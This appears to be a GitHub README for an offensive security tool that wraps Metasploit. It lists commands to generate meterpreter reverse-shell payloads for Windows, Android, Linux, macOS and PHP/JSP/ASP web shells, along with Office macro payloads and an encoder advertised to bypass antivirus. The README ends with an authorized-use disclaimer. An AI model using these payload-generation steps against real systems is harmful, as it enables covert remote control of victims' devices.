⚡ Auto-Install | 📱 Mobile Friendly | 🎯 24+ Payloads | 🔧 Zero Config
Features • Installation • Usage • Payloads • Contributing
🔥 The most powerful offensive security tool for penetration testers and ethical hackers.
MSF Commander v4.0 is a comprehensive offensive security toolkit that simplifies Metasploit Framework operations. Built with Python, it provides an intuitive interface for generating payloads, managing sessions, and executing penetration testing operations.
| Feature | MSF Commander | Manual Metasploit |
|---|---|---|
| Setup Time | ⚡ Auto-Install | ❌ Manual Config |
| Mobile Support | ✅ Yes | ❌ No |
| Payload Generation | 🎯 24+ Payloads | |
| User Interface | 🎨 User-Friendly | 💻 Terminal Only |
| Speed | 🚀 Fast | 🐢 Slow |
- 🚀 Auto-Installation - One-click setup for all dependencies
- 📱 Mobile Friendly - Works on Android (Termux) and desktop
- 🎯 24+ Payloads - Windows, Linux, Android, macOS payloads
- 🔐 Reverse Shells - TCP, HTTP, HTTPS reverse connections
- 📊 Session Management - Easy multi-session handling
- 🎨 User-Friendly Interface - Color-coded menus and options
✅ Windows Payloads - EXE, DLL, PowerShell
✅ Linux Payloads - ELF, Bash
✅ Android Payloads - APK, DEX
✅ macOS Payloads - Mach-O
✅ Web Payloads - PHP, ASP, JSP
✅ Macro Payloads - Office Documents
- 🔄 Auto-Update - Always latest version
- 📦 Modular Design - Easy to extend
- 🎯 Lhost/Lport Configuration - Simple network setup
- 📊 Payload Encoder - Bypass antivirus detection
- 🔐 Multi-Handler - Support multiple connections
# Clone the repository
git clone https://github.com/dark-hacker-error/msf-commander.git
# Navigate to directory
cd msf-commander
# Run auto-installer
python3 msf-commander.py --install# Install Termux from F-Droid
# Then run:
pkg update && pkg upgrade
pkg install python git
git clone https://github.com/dark-hacker-error/msf-commander.git
cd msf-commander
python msf-commander.py --installgit clone https://github.com/dark-hacker-error/msf-commander.git
cd msf-commander
chmod +x msf-commander.py
python3 msf-commander.py# Launch MSF Commander
python3 msf-commander.py
# Or with specific options
python3 msf-commander.py --lhost 192.168.1.100 --lport 4444# Windows Reverse TCP
python3 msf-commander.py --payload windows/meterpreter/reverse_tcp
# Android Reverse TCP
python3 msf-commander.py --payload android/meterpreter/reverse_tcp
# Linux Reverse TCP
python3 msf-commander.py --payload linux/x86/meterpreter/reverse_tcp| Option | Description | Example |
|---|---|---|
--install |
Auto-install dependencies | --install |
--lhost |
Local host IP | --lhost 192.168.1.100 |
--lport |
Local port | --lport 4444 |
--payload |
Payload type | --payload windows/meterpreter/reverse_tcp |
--output |
Output file | --output shell.exe |
| Payload | Platform | Description |
|---|---|---|
android/meterpreter/reverse_tcp |
Android | Full Android control |
android/meterpreter/reverse_http |
Android | HTTP-based connection |
android/shell/reverse_tcp |
Android | Basic shell access |
| Payload | Platform | Description |
|---|---|---|
windows/meterpreter/reverse_tcp |
Windows | Full Windows control |
windows/meterpreter/reverse_http |
Windows | HTTP-based connection |
linux/x86/meterpreter/reverse_tcp |
Linux | Full Linux control |
osx/x86/shell_reverse_tcp |
macOS | macOS shell access |
| Payload | Type | Description |
|---|---|---|
php/meterpreter/reverse_tcp |
PHP | PHP web shell |
java/jsp_shell_reverse_tcp |
JSP | Java web shell |
asp/shell_reverse_tcp |
ASP | ASP web shell |
- Linux - Kali, Ubuntu, Debian, Parrot
- Android - Via Termux
- macOS - Limited support
- Windows - Via WSL
- iOS - Not supported
A: MSF Commander is for educational and authorized penetration testing only. Always get proper authorization before testing.
A: Yes! MSF Commander is fully compatible with Android via Termux.
A: MSF Commander v4.0 includes 24+ different payload types.
A: No! The auto-installer handles everything.
Contributions are welcome! Here's how you can help:
- Fork the repository
- Create a feature branch (
git checkout -b feature/amazing) - Commit your changes (
git commit -m 'Add amazing feature') - Push to the branch (
git push origin feature/amazing) - Open a Pull Request
See CONTRIBUTING.md for detailed guidelines.
Found a bug? Please open an issue with:
- Bug description
- Steps to reproduce
- Expected vs actual behavior
- Screenshots (if applicable)
This project is licensed under the MIT License - see the LICENSE file for details.
For reporting security vulnerabilities, please see SECURITY.md.
This tool is provided for educational and authorized security testing purposes only.
The author is not responsible for any misuse or damage caused by this program.
Always obtain proper authorization before performing security testing.
Unauthorized access to computer systems is illegal and unethical.
If you find MSF Commander useful, please give it a ⭐ star on GitHub!